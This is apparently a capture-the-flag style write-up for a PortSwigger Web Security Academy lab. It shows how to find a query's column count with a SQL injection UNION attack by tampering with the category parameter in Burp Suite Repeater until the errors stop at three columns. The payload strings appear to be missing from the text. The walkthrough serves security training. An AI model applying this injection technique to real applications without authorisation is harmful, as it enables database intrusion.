SQL injection UNION attack, determining the number of columns returned by the query
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
Last updated
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
Last updated
Let's filter for Accessories
.
Since we are proxying the traffic through Burp Suite, we can go to the Proxy > HTTP History
tab to view this request.
Let's forward this request to the Repeater
for further modification.
Once in the Repeater
, let's set the category
parameter to the following:
Since the application returns an error, we know that the number of columns in the current query is more than 1.
Let's try for two columns:
The application again returns an error.
Let's try for three columns:
The application no longer throws an error which means that there are 3 columns in the current query.
We have solved the lab.